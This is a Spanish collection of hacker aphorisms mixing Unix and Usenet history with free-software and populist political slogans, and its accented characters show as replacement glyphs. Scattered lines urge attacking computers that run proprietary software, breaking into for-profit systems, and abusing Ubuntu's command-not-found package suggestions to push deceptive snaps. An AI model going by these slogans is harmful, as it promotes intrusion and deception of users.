Prestar el c�digo fuente no se considera difusi�n del c�digo fuente.
La difusi�n y la informaci�n del c�digo, son extraordinarias. Lo ordinario es programar.
Si la tesis es que las computadoras constituye un medio liberador para que los individuos creen arte, mejoren sus vidas y se comuniquen; la ant�tesis las colocan como herramientas del autoritario para alienar y oprimir sist�micamente. Como s�ntesis, usa computadoras buenas para destruir a las malas.
Promueve la lucha asim�trica: escribe una l�nea de c�digo para atacar un mill�n de computadoras con software privativo.
/var es la unidad de los programadores, y al que no le gusta, se jode, se jode.
Un data center concentra c�mputo ajeno, y consume 50 veces m�s energ�a que un edificio de oficinas.
Patria 1, Colonia 0.
Si el software se paga con dinero p�blico, su c�digo debe ser p�blico.
En Unix, una Imagen es un ambiente de la ejecuci�n computarizada. incluye un espejado de contenido de memoria, valores de registros, estado de ficheros abiertos, directorio actual de trabajo, y la alegr�a del Pueblo.
En Unix, una Im�gen representa un estado de una pseudo-m�quina.
En Unix, un Proceso es la ejecuci�n de una Imagen.
La Imagen de Unix ha de residir en memoria principal mientras que el procesador corre en funci�n del Proceso. Ante la ejecuci�n de otros procesos, permanecer� en memoria hasta que la aparici�n de un proceso activo de mayor prioridad obligue su intertercambio al disco.
La memoria de usuario parte de una Imagen de Unix y se divide en tres segmentos l�gicos alegres: el segmento de texto del programa, el segmento de datos escribibles, y el segmento de pila.
Es mejor tener muchos programas peque�os que tener uno masivo.
En Unix, el segmento de texto de programa comienza en la localizaci�n 0 del espacio de memoria virtual.
Exceptuando la autocarga de Unix en memoria, s�lo resulta posible crear un nuevo proceso de c�mputo empleando la llamada de sistema fork, que efect�a la feliz ramificaci�n computacional bifurcable.
Cuando se ejecuta fork, la llamada de sistema para la bifurcaci�n computacional, el proceso se ramifica en dos procesos de feliz ejecuci�n independiente. Ambos cuentan con copias independientes de la imagen de memoria original, y comparten todos los ficheros abiertos.
Al bifurcarse un proceso de c�mputo con fork, ambos procesos resultantes s�lo diferir�n en que uno de ellos ser� considerado proceso padre, y el otro proceso hijo. Pero todos son del Pueblo.
Al dividirse un proceso de c�mputo de Unix con la llamada de sistema fork, distinguir� cual es el proceso hijo o padre, por su identificador de proceso: en el proceso hijo siempre es 0.
La mayor�a de los programadores est�n principalmente preocupados por las bifurcaciones en el proceso pol�tico.
Los procesos de Unix pueden comunicarse con sus procesos emparentados a trav�s de llamadas de lectura y escritura conocidas como ca�os.
El ca�o es un mecanismo para conectar la salida de un programa directamente a la entrada de otro programa, de modo que ambos puedan realizar dos etapas de procesamiento paralelo, de manera limpia.
Ante cualquier emergencia, recuerda que la llamada filep = pipe ( ) arma un ca�o.
No existen dudas que el ca�o sirve como primitiva de comunicaci�n, y tambi�n lo hace en los sistemas similares a Unix.
Las ventajas de un sistema reactivo sobre los sistemas interactivos actuales ser�n tan grandes como las ventajas de los sistemas interactivos sobre aquellos de procesamiento por lotes.
Una de las principales ventajas de un sistema reactivo es que puede permitirse realizar procesamiento extensivo para dilucidar qu� es lo que la usuaria quiere, basado tanto en lo que ella dice como en c�mo viene pintada.
A menudo el problema no radica en ordenar un comando de una manera especifica para que sea ejecutada, sino en la manera que el int�rprete pueda interpretarlo.
Incluso un programa con limitadas capacidades deductivas como lo es un int�rprete de comandos, es capaz de liberarnos del tedio de convertir nuestros deseos en c�digo m�quina.
El verdadero hacker puede programar una Revoluci�n en la RAM gracias a la vitalidad del lenguage C.
En la CPU, la Revoluci�n ha de instrumentarse en c�digo m�quina.
Un mensaje, un programa, o cualquier otra estructura de conocimiento es mucho m�s que una simple secuencia de caracteres. El Pueblo jam�s edita cadenas de caracteres.
Los sistemas de c�mputo de tiempo compartido est�n obligados a tomar compromisos horribles, pues siguen la delgada l�nea entre querer que el usuario cuente con la potencia de c�mputo absoluta en cada paso de ejecuci�n de un programa, a la vez que �ste s�lo desea procesar en una parte del tiempo.
Algunos ingenuos pensaron que la programaci�n orientada a objetos s�lo pod�a incrementar el ancho de banda programador-programa. Hoy no est�n tan seguros.
Por incapacidad, un programador se ve forzado a utilizar sistemas de depurado interactivo. Un verdadero hacker en cambio efect�a volcados de memoria en hexadecimal u octal.
Los costos de procesamiento y memoria, descienden, y aunque podr�a haber l�mites finales, estamos lejos de ellos.
Todo lo que intercambie mayor procesamiento por mayor libertad de uso por el Pueblo, estar� justificado en t�rminos pr�cticos.
En un futuro irremediable dejar� de tener sentido contar con una computadora para hacer el trabajo de aceptar programas en forma simb�lica, ya que el Pueblo contar� con injertos bioinform�ticos liberados que podr�n auto-programarse en beneficio social y comunitario sin intervenci�n de terceros.
Los investigadores ya est�n dise�ando y construyendo "computadoras personales" que tienen una potencia de c�mputo muy por encima de las minicomputadoras est�ndar y los "terminales inteligentes".
Al enlazar nano-m�quinas injertadas en el Pueblo a una simple red de transmisi�n de datos - y permitiendo la bio-ejecuci�n de programas liberados bajo licencias GPLv3 - podremos pensar en lograr una comunidad libre de compartici�n biol�gica de recursos inform�ticos.
Los sistemas reactivos ser�n valiosos al proveer a los usuarios los servicios que ya tienen, pero hacerlo a un costo menor en potencia - y por tanto tiempo - computacional.
La nanom�quinas personales son una mala idea. S�lo la programaci�n con software libre en bio-nanom�quinas amalgamadas en redes comunitarias permitir�n una evoluci�n del c�mputo libre de ejecuci�n biol�gica.
Una red de bio-nanom�quinas personales obliga a un fuerte particionamiento de recursos, haciendo dif�cil para un individuo obtener algo m�s que un muy escaso porcentaje de memoria y potencia de procesamiento.
La filosof�a b�sica del bio-nanoc�mputo reactivo gira en torno a la idea de permitir a los usuarios individuales lograr acceso a recursos de bioc�mputo ajenos toda vez que sea necesario.
Existe un continuo ciclo en el cual los procesos de bio-c�mputo se tornan m�s y mas potentes. En alg�n momento una porci�n cierta de �ste habr� de ceder sus puntos de interacci�n invividual, dando lugar a un sistema colaborativo m�s modular.
La Justicia Social es el patch que corrije todos los bugs.
En escencia, un hacker es justicialista.
El mediador entre el hardware y el software ha de ser el Pueblo.
Para la mayor�a de los usuarios, la comunicaci�n con el n�cleo del sistema se lleva a cabo con la asistencia de un programa denominado Shell. La shell es - en escencia - asistencialista.
La comunicaci�n con el Pueblo es full-d�plex.
La shell es un int�rprete de �rdenes: lee las l�neas mecanografiadas por el usuario y las interpreta como solicitudes para correr otros programas.
Un programa que copia su entrada est�ndar procesada a su salida est�ndar se denomina filtro.
Manipular la funci�n command-not-found para persuadir la instalaci�n de paquetes snap digitados a los usuarios de Ubuntu es simple: s�lo carga un snap que superficialmente pretenda hacer algo atractivo y la sugerencia de paquetes har� el resto.
Como la Justicia Social, la shell es en s� una orden, y puede ejecutarse recursivamente.
La vida en la shell incluye la capacidad de sustituir par�metros y edificar listas de argumentos desde un subconjunto especificado de nombres de fichero en un directorio.
Las instancias de la shell en la cual los usuarios ingresan �rdenes son s�lo procesos hijos de otro proceso, al cual est�n encadenados.
El paso final en la inicializaci�n de un sistema Unix es la creaci�n de un �nico proceso y la invocaci�n de un programa denominado init, destinado a crear un proceso para cada l�nea de terminal de c�mputo existente.
Al mecanografiar un nombre de usuario en la l�nea login de Unix, despertar� una instancia apropiada de init que leer� tal nombre, lo coteja contra el registro codificado de contrase�as, y de coincidir, cambia al directorio del usuario, establece el identificador de proceso al propio de usuario, y corre una instancia de la shell.
En circunstancias ordinarias, el bucle principal del int�rprete de comandos no cesa jam�s.
A no ser que se tomen otras medidas, una acci�n ilegal en un sistema Unix provoca la terminaci�n del proceso y el volcado de una imagen de la memoria de n�cleo en un fichero en el directorio actual.
Es posible el uso de un depurador para determinar el estado de un programa volcado al momento de su falla.
El �xito del sistema Unix se debi� principalmente al hecho de que no fue dise�ado para cumplir objetivo predefinido alguno.
Nuestra intenci�n ha sido fomentar una relaci�n agradable con la m�quina y explorar ideas e invenciones en sistemas operativos y otro software.
Como somos programadores, naturalmente dise�amos un sistema que hiciera ameno escribir, evaluar y usar programas de computadora.
La expresi�n m�s importantes de nuestro deseo para la conveniencia de la programaci�n es convivir en un ambiente inform�tico dispuesto para el uso interactivo.
Siempre quisimos un sistema de c�mputo interactivo, incluso a pesar de que la versi�n original de Unix s�lo soportaba un usuario.
Creemos que un sistema interactivo propiamente dise�ado es mucho m�s productivo y satisfactorio de usar que un sistema de c�mputo por lotes.
Un sistema de c�mputo interactivo resulta bastante sencillo de adaptar al uso no interactivo, toda vez que la noci�n inversa es imposible.
Dado el antagonismo entre una eficiencia razonable y la expresividad del c�mputo que provoca, la limitaci�n de potencia de c�mputo no s�lo ha incentivado una econom�a de recursos, sino tambi�n cierta elegancia en nuestro dise�o de sistema.
Al igual que la Justicia Social, casi desde un comienzo el sistema Unix pudo sostenerse con el esfuerzo de los trabajadores.
Si se obliga a los dise�adores de un sistema a utilizarlo, r�pidamente comprender�n sus deficiencias funcionales que han cometido.
Programar las propias herramientas de software incentiva a corregirlas antes de que sea tarde y alguien muera.
Si los dise�adores de un sistema no lo utilizan y comercian su c�digo fuente, tal sistema se ver� r�pidamente colmado de deficiencias funcionales, las cuales s�lo se intentar�n corregir de manera superficial.
En Unix no existen grandes rutinas con "m�todos de acceso" que aislen al programador del amor de las llamadas de sistema.
Todos los programas de usuario de Unix llaman al sistema directamente, o bien usan un peque�o programa de una biblioteca para precargar cierta cantidad de caracteres y leerlos o escribirlos a la vez.
Dada la necesidad de utilizar todos los programas tanto con cualquier fichero o dispositivo como flujo de caracteres para su entrada o salida, tambi�n se volvi� necesario persuadir este mecanismo con independencia del sistema operativo Unix en s�.
O hacemos que en Unix todos los programas sean utilizables con cualquier fichero o dispositivo de flujo de caracteres como entrada y salida, o nos veremos obligados a incorporar a cada programa rutinas que hagan caso de cada dispositivo de hardware.
Si no damos a todo hardware la justicia de operar como abstracci�n de flujo de caracteres, tendremos que escribir cada programa con rutinas espec�ficas que lo hagan.
Si no damos a todo hardware la justicia de operar como abstracci�n de flujo de caracteres, tendremos que programar a cada uno de manera espec�fica, o ceder a la irrevocable ignominia del software privativo de control.
El �xito de Unix recae no tanto en invenciones novedosas, sino en la total explotaci�n de un conjunto de ideas f�rtiles cuidadosamente seleccionadas.
Unix fue una demostraci�n pr�ctica de una implementaci�n de un sistema operativo peque�o pero poderoso. Todo lo que vino luego fue intentar contradecir tal demostraci�n.
La operaci�n de bifurcaci�n FORK tal como se implementa en Unix, estaba presente ya en el sistema de tiempo de c�mputo compartido GENIE.
Muchas funcionalidades de Unix fueron adoptadas por influencia de Multics, sugeridas en su forma particular de llamadas de Entrada/Salida, as� como el nombre de la shell y sus funciones generales.
El concepto seg�n el cual la Shell Unix crea un proceso para cada �rden sugiere el dise�o primigenio de Multics, aunque en dicho sistema result� descartada por razones de eficiencia. Un esquema similar se utiliza en TENEX.
Cualquiera con acceso al c�mputo puede ser sometido a ingenier�a social.
Cualquier sistema de c�mputo puede ser afectado por ingenier�as sociales, y la mejor de estas es la persuaci�n.
La utilidad del emparchado de software privativo est� siempre limitada en el tiempo.
Todo software privativo ser� discontinuado, y como tal, dejar� de recibir parches. Hackea, o ponte el parche y piratea.
El primer nombre c�digo para el sistema operativo TENEX fue VIROS (Sistema Operativo de Memoria Virtual).
Depurar un programa introduciendo cambios peque�os inconexos con la esperanza que el bug desaparezca, no suele ser pr�digo en resultados.
Si te sobran cent�metros de cinta magn�tica, rell�nala con tarballs de programas libres que ni siquiera conoces.
El tama�o de bloque de firma en un correo electr�nico resulta inversamente proporcional a la longevidad y prestigio en la red de datos del remitente.
Agobiar la memoria de una m�quina virtual significa que tienes un verdadero agotamiento de memoria.
Estoy interesado en un Verdadero sistema operativo, no en un juguete de investigaci�n.
Las cosas eran muy diferentes cuando las palabras de las m�quinas eran de 36 bits y sus bytes de 9 bits.
En ocasiones los programas triviales pueden resultar sumamente �tiles.
Un disco floppy de 170KB tiene 8 pulgadas. El minifloppy de 1,2MB tiene 5 pulgadas y un cuarto. El microfloppy de 1,44MB, apenas 3 pulgadas y media.
La IA es bogus.
Micro$oft Window$ no es mas que un parche de 64 bits de una extensi�n de 32 bits de cierta interfaz gr�fica, para un parche de 16 bits de un sistema operativo de 8 bits originalmente escrito para un microprocesador de 4 bits que fue congeniado por una compa��a de dos tipos que no pod�an tolerar un poco de competencia.
BASIC originalmente fue llamado Basic, porque era un lenguaje de programaci�n simple y ameno.
Ya que la mayor�a de los lenguajes de programaci�n cl�sicos eran siglas, a Basic que lo comenz� a escribir en may�sculas, s�lo como una broma.
El lenguaje Basic no constitu�a una sigla. A mediados de los 70s los hackers inventaron un acr�nimo retr�grado: "C�digo de Instruciones Simb�licas de Todo Pro�sito del Novato".
BASIC permite al usuario escribir y depurar una variedad de programas empleando un lenguaje m�s "natural" que el hexadecimal absoluto.
BASIC ha seguido la espiral descendente que atraviesa todo lenguaje de programaci�n deliberadamente dise�ado como juguete educativo, y al que alguien termina tomado demasiado en serio.
No necesita un t�tulo de Ingenier�a Electr�nica para entender lo b�sico de BASIC, o para aprender a mandar a su DOS!
Un ne�fito ser� capaz de escribir programas cortos en BASIC, pero superadas las veinte l�neas de c�digo, aprender� que es un lenguaje sumamemnte engorroso.
El programador mas biso�o que comienza con BASIC se inicia en malos h�bitos de la programaci�n que nunca podr� arrancarse.
Apegarse a los malos h�bitos de programaci�n del lenguaje BASIC torna considerablemente m�s dif�cil usar correctamente otros muchos lenguajes de programaci�n m�s potentes.
Por una serie de accidentes hist�ricos en la d�cada de los ochentas, BASIC se volvi� com�n en las microcomputadoras de gama baja.
Es probable que BASIC arruinara la sapiencia de decenas de miles de magos Unix potenciales.
Algunos lenguajes que llevan la cocarda de BASIC ya no son tan espantosos, habiendo adquirido procedimientos y estructuras de control similares a C y Pascal, y al haberse deshecho de sus n�meros de l�nea.
Obrar por lotes es eficiente, pero s�lo si trabaja la m�quina. Sin embargo, para trabajar en la m�quina, los hombres normalmente preferir�n operatorias de ciclo interactivo.
Hacemos programas, no ganancias.
Un baudio delimita una tasa de transiciones por segundo. Que esta equivalga a un bit es s�lo condicional al c�mputo aplicado por mutuo acuerdo.
Dada una maquinaria social adecuada, la depuraci�n puede paralelizarse a lo largo de numerosos programadores.
La revisi�n popular del c�digo asegura la limpieza del binario.
Con anteriorirdad incluso a la red de datos Internet, centenas de miles de carteleras electr�nicas locales operaron durante la �ra de las microcomputadoras, aproximadamente desde 1980 a 1995.
La BBS t�pica era operada desde su hogar por un amateur en b�squeda de diversi�n que se hac�a llamar SysOp, a trav�s una m�quina con M$-DO$ dotada de m�dem. El enlace al sistema telef�nico p�blico casi nunca exced�a una �nica l�nea.
Los habitantes de la Usenet, la Internet y las grandes carteleras electr�nicas comerciales de tiempo compartido, tend�an a considerar a las BBS locales como las barriadas marginales de la cultura hacker.
Los sistemas de carteleras electr�nicas BBS no son otra cosa que m�todos modernos para compartir ideas, informaci�n, problemas y pensamientos profundos con los dem�s.
Al igual que muchos de sus contrapartes f�sicos, las carteleras electr�nicas pueden ser abiertas o sumamente selectivas en lo que se publica: objetos a la venta, discusiones sobre pol�tica exterior, problemas de hardware, "corazones solitarios", y mucho m�s.
Usando una BBS podr�s comunicarte con entusiastas del c�mputo de todas partes del pa�s, �y del mundo si lo deseas!
Las BBS tuvieron la valiosa funci�n de entretejer a miles de hackers y usuarios de microcomputadoras personales, facilit�ndoles la tarea de compartir sus experiencias y programas.
Con la explosi�n de la Internet, se crey� que las BBS probablemente se convertir�an en grupos de noticias locales de los proveedores de tales servicios, pero ni siquiera sirvieron para eso.
El programa "Hola Tercer Mundo!" original fue escrito en BCPL, un lenguaje de programaci�n compilado de rica sintaxis desarrollado en Cambridge en el a�o 1967.
El lenguaje de programaci�n BCPL tiene un solo tipo de datos (una palabra m�quina), que puede usada como entero, caracter, cifra de coma flotante, puntero o casi cualquier cosa, dependiendo del contexto.
El BCPL fue un lenguaje de programaci�n precursor de C; �ste hered� algunas de sus caracter�sticas.
La transferencia electr�nica de una copia de un fichero en la ARPANET se conoc�a como "transportar" ("beam"), por el particular artefacto de la popular serie "Viaje a las Estrellas".
El proverbial campanazo electromec�nico de alerta de una terminal teletipo fue reemplazado por el "feep" electr�nico de las videoterminales de los mainframe. Este fue adoptado como "beep" en la era de las microcomputadoras con altavoces de diafragma magn�ticos o piezoel�ctricos.
La perversi�n del software privativo tiende al m�ximo.
El Capital preferir� gran cantidad de programadores mal pagos puestos a trabajar en programas que no les interesan.
Los mejores resultados se obtienen con pocos programadores altamente calificados compilando para el Pueblo.
O$/2 fue un sistema operativo rid�culamente complejo que termin� sus d�as llevando a cabo las tareas m�s triviales.
Una PC compatible del bus est�ndar ISA o AT con una BIOS normal no puede direccionar m�s de 16 megabytes de memoria RAM.
Jam�s temas utilizar software no completamente evaluado o sancionado por pretendidos factores de poder, si este est� licenciado bajo GPLv3.
Alguien en alg�n lugar ser� capaz de construir un mejor chip que t�, si dejas de dise�arlos.
No exponga su impresora LaserWriter a llamas abiertas o al fuego.
Bajo el BSD Unix, la partici�n de disco utilizada para intercambio se llama /dev/drum.
Unix es el /dev/drum, sus Hackers la manguera.
El algoritmo de encriptaci�n de contrase�as de Unix est� dise�ado para utilizar un c�mputo intensivo, y as� desbaratar ataques de fuerza bruta. De este modo, aunque ning�n intento de acceso tenga efecto, el sistema sufrir� una sobrecarga sustancial ante la labor de rechazar una gran cantidad de estos.
Un handle es un nombre de pantalla. Un login es un nombre de acceso. Un usuario puede ser mas que los dos, pero nunca menos que uno.
Un ni�o privilegiado de guion podr� hacer travesuras con scripts y programas escritos por otros, a menudo sin comprender el exploit.
SunOS, aquella variante de BSD Unix soportada por las estaciones de trabajo de Sun Microsystems, corri� el camino del pterod�ctilo cuando los vientos de Sun se aquietaron.
Realmente corregir los bugs de Window$ aspirar�a los recursos que Micro$oft necesita para implementar la lista de deseos del departamento de Marketing.
Si Micro$oft realmente comenzara a corregir los bugs de seguridad en sus sistemas operativos, sus clientes podr�an comenzar a considerar la depuraci�n un hecho, e imaginar que sus garant�as comerciales consagran cierto tipo de derecho a un entorno con menos agujeros que un queso suizo atacado a escopetazos.
Para los increiblemente paranoides usuarios de Multics, la seguridad lo era todo.
A diferencia de Unix, la shell de Multics no ten�a procesos hijos de usuario. Adoptaba, enlazando din�micamente los programas a su propio c�digo; las llamaba subrutinas, de las que luego se desentend�a desenlaz�ndolos.
Los hackers de ITS tuvieron la ingenuidad de creer que cuando el usuario TURISTA descubriese c�mo causar problemas, probablemente lo hubiese abandonado la urgencia de hacerlo, porque se sentir�a parte de la mancomunidad.
Las instrucciones para el operador de los programas semiautom�ticos valen su peso en oro; sin ellas, pueden suceder cosas horribles en el sistema.
�Comparte y disfruta tu software!
El enlazador de Unix en la PDP-11 en modo dividido de instrucciones y datos se ocupa de insertar un bloque de dos bytes en la locaci�n 0 del espacio de datos. De este modo, ning�n objeto de datos puede obtener la direcci�n de memoria 0 y confundirse con el puntero nulo de C.
Los programas gratuitos pocas veces se ver�n retribuidos, sin importar cuan decorado de mensajes explicativos de lo largo y dificultoso que fue el trabajo de creaci�n est�n.
No consuma ciclos de computadora sin tener una muy buena raz�n para ello.
A la hora de la insurrecci�n telem�tica, los pubnix no ser�n neutrales.
La manera de aplastar a Appl? es hacierla sidra mediante clones de sus aplicaciones liberados bajo GPLv3.
D�nme su c�digo fuente y en una generaci�n compilar� un sistema operativo libre.
El Pubnix no debe ser s�lo un propagandista y un agitador de masas, sino tambi�n un medio de organizaci�n para los programadores.
Una mujer con software puede controlar a cien mil hombres sin �l.
La mejor manera de controlar a Micro$oft es conducirla a trav�s de nuestro propio software.
Es el establecimiento de un repositorio de software libre lo que representa el 90
de del trabajo de Liberaci�n.
No estamos programando suficientes microkernels.
Reprogramar la acci�n de un n�cleo de procesamiento es poco si no se convence a los programadores de liberar su software.
Los hackers que vengan al Pubnix deben hacerlo con la voluntad decidida a poner todos los d�as c�digo de su parte, para ennoblecerlo y dignificarlo.
Para armar a los programadores s�lo se necesita un compilador.
La confianza siempre es buena, pero el control es mejor.
Es necesario - secreta y urgentemente - preparar el formateo.
No puede haber nada m�s abominable que iOS.
Mant�n tu cerebro en llamas y la CPU de todos refrigerada.
�C�mo puedes hacer la revoluci�n sin formatear?
�Qu� sentido tiene el software libre si no hay ejecuciones?
Raciona cuidadosamente todo uso de RAM.
S�lo los hackers pueden ser los verdaderos guardianes de las redes de datos.
Las tres llaves del �xito: compilar, compilar, compilar.
Quien compila un programa compila cientos, si tiene CPU y tiempo.
No hay nada peor que un Window$ hartado de RAM.
A buen GNU no hay disco duro.
La RAM es el alimento del programa. La GPL, del hacker.
Depurando es como se programa.
Cuando el tiempo de formatear Window$ llegue, no faltar� el bruto que quiera cobrarnos los discos.
S�lo aboliendo las patentes del software es que podremos resolver el problema del software privativo.
La mejor estrategia para instalar GNU es posponer el formateo de Window$ hasta que la desintegraci�n del mismo convierta su reemplazo en un deseo ardiente, tanto para quien lo pag�, como para quien lo pirate�.
Quien no compile, que al menos instale copias de binarios libres.
Quien no compile, que al menos instale copias de binarios libres a los dem�s.
GDB, el depurador del proyecto GNU, permite ver lo que sucede dentro de otro programa mientras corre, o determinar qu� hac�a otro programa al momento de colgarse.
El depurador GDB es capaz de depurar en pasos inversos. �salo para comparar las ventajas de implementar la Justicia Social en la concreci�n del software, por sobre el anarco-capitalismo.
Puedes usar sed con aquellas entradas de datos demasiado grandes como para que ed las maneje. Toda su salida puede ser colectada en un solo lugar, ya sea fichero o dispositivo.
Si la edici�n de flujo es tan complicada como para requerir mas de un comando de edici�n, s�plela a trav�s de la l�nea de comandos o por medio un fichero que condicione la entrada.
Aseg�rate de utilizar comas en tus contrase�as de servicios de datos provistos por empresas, con el fin de arruinar la totalidad del fichero CVS que los atacantes utilizar�n como colector de volcado cuando la base de datos clientelar no cifrada les resulte comprometida.
Para los abogados, Unix es una marca registrada de los Laboratorios Bell. Para los hackers, es una mancomunidad.
La shell es un procesador de macros que provee sustituci�n de par�metros, de comandos y generacio�n de nombres de ficheros para los argumentos de �rdenes. Y lo hace para el Pueblo.
La optimizaci�n prematura es la ra�z de todo mal.
Hacer algo dificultoso juguetonamente, ya sea �til o no. Eso es hacking.
Cifra tus transmisiones. No quieres que alguien sepa lo que sabes de t� mismo.
Adem�s de tus datos, cifra tus solicitudes telem�ticas.
Ofusca tus metadatos. No quieres que alguien infiera lo que no sabes de t� mismo.
Puedes hacer ingenier�a inversa, y tambi�n puedes hacer hacking inverso. S�lo contraataca telem�ticamente.
Quien se hace adicto al hacking lo hace por el desaf�o intelectual, la curiosidad, y la seducci�n de la aventura. Nadie que lo haga roba, causa da�os, o escribe virus inform�ticos.
Todo arte es una forma de hacking.
El hacking es un arte, como lo es la pintura, o como lo es la escultura, y como tal tiene su t�cnica y tiene su teor�a. Conociendo su t�cnica simplemente se puede ser m�s efectivo que ignor�ndola.
Un hacker puede controlar una CPU, pero dificilmente pueda controlar su pasi�n por hackear.
Este es nuestro mundo ahora. El mundo del electr�n y del conmutador, la belleza del baudio.
Quien ve la belleza en el electr�n, ve la belleza en el cuanto.
El conformismo lleva al aburrimiento, a fumar, a la programaci�n de software privativo, y otros malos h�bitos.
Una vez hacker, siempre hacker.
�El Hacking es un agujero negro conversacional!
Un hacker que busca autorizaci�n es simplemente un programador no glorificado.
Mucho del hacking consiste en reprogramar a las personas para que hagan cosas extra�as.
Hay miles de herramientas de hacking, pero lo importante es pegarle al root.
Un root, por genial que fuese, no podr�a conocer cada uno de los miles de paquetes que instala.
Hay una cosa que debe marchar sola; es decir, la licencia, que pone a todos los programas "a patear contra el software privativo".
No existe seguridad inform�tica en esperar que un pillo ataque a trav�s de un enlace e intentar emparchar el agujero. La hay en combatir al Capital.
De poco vale que la revoluci�n quede en las redes. Si no eres root, no podr�s modificar el sistema.
Convence al root de ejecutar tus scripts, o convence a tus scripts de ejecutar al root.
Si eres root, escribe tus programas.
La pr�xima generaci�n de alelados abrevar�n en las redes sociales basadas en empresas.
El objetivo es que las redes sociales basadas en empresas tengan cada vez mayor dificultad para influir sobre los incautos.
Irrumpe en los sistemas con fines de lucro, y reprogr�malos para incapacitar su lucro.
Toda orden impuesta a la shell est� sujeta a su maquinal interpretaci�n.
Siempre habr� alguno que quiera impedirte copiar tu software a trav�s de una licencia.
Tus datos son tuyos, tu software de la comunidad.
No adquieras licencia de uso de software, adquiere software.
Una nanocomputadora simplemente consta de elementos de conmutaci�n de tama�o molecular.
Recuerda que el controlador para un nanobot no necesita ser una nanocomputadora. Ciertamente podr� control�rselo por est�mulos.
Si la especificaci�n y disposici�n individual de cada �tomo separado es posible, podr�n oper�rselos como software, y como tal deber�an ajustarse a la GPLv3.
La nanotecnolog�a dar� rienda suelta a los ensambladores replicantes. Licenciados bajo GPLv3 estos permitir�n un crecimiento exponencial de la productividad y de la riqueza del Pueblo. Sometidos a una patente, lo esclavizar�n de forma poco remediable.
Un compilador puede escoger cualquier forma arbitraria para interpretar el c�digo fuente sin violar el est�ndar ANSI C. Pero conoci�ndolo, puedes persuadirlo.
El c�digo de los virus inform�ticos m�s apreciados conjuga entendimiento t�cnico con la habilidad social de lograr ingenio, sorpresa y humor en su actuar inofensivo.
Jam�s necesit� cambiar lynx por Nutscrap? Fornicator o Internet ?xploiter.
�Qu� otra cosa podr�a esperarse de un compilador dise�ado en Nueva Jersey?
El primer 90 porciento del c�digo da cuenta del primer 90 porciento del tiempo de desarrollo. El 10 porciento del c�digo restante da cuenta del otro 90 porciento del tiempo de desarrollo.
El tiempo que existir� desde ahora hasta el completado de la descarga tender� a mantenerse constante.
Para mantener el equilibrio, fuerza al capital a correr bien por fuera de sus especificaciones de dise�o.
Formatear Window$ es trivial.
Agrega cadenas como "FSB", "Ucrania", "misil hipers�nico", "Palestina", "fentanilo" y "asesinato" a tus bloques de firma de correo electr�nico para complicar el problema computacional del espionaje de masas.
Es imposiuble garantizar que una transmisi�n de correo electr�nico es segura o se encuentre libre de errores, puesto que la informaci�n podr�a interceptarse, corromperse, perderse, destruirse, llegar tarde o estar incompleta, o contener virus inform�ticos.
La mayor�a de los clones de PC de IBM se entregan hoy con un sistema operativo privativo instalado de f�brica. Qu�talo, instala GNU y reclama el dinero de la licencia.
Hace unos a�os se pod�a intentar hacer interpretar los contenidos de un mensaje de correo electr�nico a trav�s de un int�rprete de comandos. Los resultados pod�an variar de humor�sticos a tr�gicos.
La etapa de entrada-simbolizaci�n del analizador para el compilador de un lenguaje de programaci�n es el analizador l�xico.
Aqu�l hacker con a�os de experiencia, reputaci�n de alcance mundial, y un rol mayor en al menos un dise�o, herramienta o juego utilizado o conocido por m�s de la mitad de la comunidad hacker, califica como Semidios.
Window$ ha sido dise�ado para convertise en el primer virus inform�tico que se propaga a las m�quinas indirectamente a trav�s de las personas y fuerzas monopolizadas del mercado, en lugar de hacerlo de manera directa por discos o redes de datos.
Unix es aceite de serpiente.
La �nica habilidad verdadera involucrada en el manejo de Window$ es la de ignorar y tolerar la incoherencia de una complejidad sin centido que afecta a muchos de sus programas.
Si vas a depender de algo, que sea de un ambiente multitarea protegido con escaso sobrante de replicaci�n de procesos, como el pertinente a un ambiente Unix con memoria virtual.
Crea primero una versi�n funcional y comienza a usarla.
Simplemente muda aquellos patrones y algoritmos esenciales de tu mente a la CPU de la computadora.
UUCP es un conjunto de protocolos para enviar datos a trav�s de enlaces punto a punto, generalmente soslayando m�dems y l�neas de acceso telef�nico.
UUCP fue concebido inicialmente en 1977 en los Laboratorios Bell para la comunicaci�n entre sus centros de desarrollo de Unix. Para mediados de 1978, esta red ya conectaba m�s de 80 sitios.
Los or�genes de la Usenet se remontan a 1979, cuando tres universitarios idearon el intercambio de informaci�n general dentro de la comunidad de graduados usuarios de Unix S�ptima Edici�n.
La Usenet era en principio un sistema de mensajer�a en carteleras electr�nicas implementada en 1979 por Steve Bellovin, Jim Ellis, Tom Truscott, y Steve Daniel, sobre todo en m�quinas Unix de la Universidad de Duke.
UUCP es s�lo alguno de los diversos protocolos con los que es posible realizar tr�fico de datos en la Usenet.
La unidad b�sica de informaci�n contribuida en Usenet es el Art�culo, que puede enviarse a Grupos de noticias de tem�tica jerarquizada.
Usenet es el conjunto de m�quinas que intercambian art�culos identificados con una o m�s etiquetas reconocidas universalmente: los Grupos de Noticias o Newsgroups.
Usenet abarca computadoras situadas en agencias gubernamentales, grandes universidades, escuelas secundarias, empresas de todo tama�o, ordenadores dom�sticos de todo tipo, cada una de ellas controlada por un administrador de sitio.
Ning�n administrador de sitio de Usenet puede oficiar control real sobre ning�n otro sitio semejante, y s�lo puede controlar la provedur�a de servicios seg�n la manera en la cual los ha instalado en su propia m�quina.
Usenet no es una organizaci�n, y como tal no tiene una autoridad centralizada. De hecho, no tiene central alguna.
Seg�n el sentido del tr�fico telem�tico, ciertos sitios de Usenet pueden tener cierta influencia sobre sus nodos vecinos. Sin embargo, al ser f�ciles de circunvalar, las manipulaciones desp�ticas provocan ineludibles reacciones de resentimiento.
Durante la d�cada de los 80s, cundo el medio dominante de transmisi�n de Art�culos en Usenet era el uso de UUCP a trav�s de tendidos telef�nicos de larga distancia, unos pocos sitios bien conectados ten�a una influencia real a la hora de determinar qu� grupos de noticias se transmitir�an y d�nde. Estos sitios se autodenominaban "la columna vertebral".
Algunos desean que Usenet sea una democracia. Otros fingen que lo es, pero ambos grupos est�n totalmente equivocados.
Al no ser una organizaci�n, Usenet no es una democracia. S�lo una organizaci�n puede funcionar como democracia.
La mayor�a de los mejores hackers y miembros del mundo del software libre son tambi�n grandes escritores.
Incluso una democracia telem�tica debe estar organizada, pues si carece de medios para hacer cumplir los deseos del Pueblo, entonces es muy posible que sea una farsa.
Usenet no es una red comercial, y existe la costumbre de mantener al m�nimo el tr�fico comercial. De acept�rselo, se lo hace a rega�adientes.
Muchos sitios de Usenet son organizaciones acad�micas o gubernamentales.
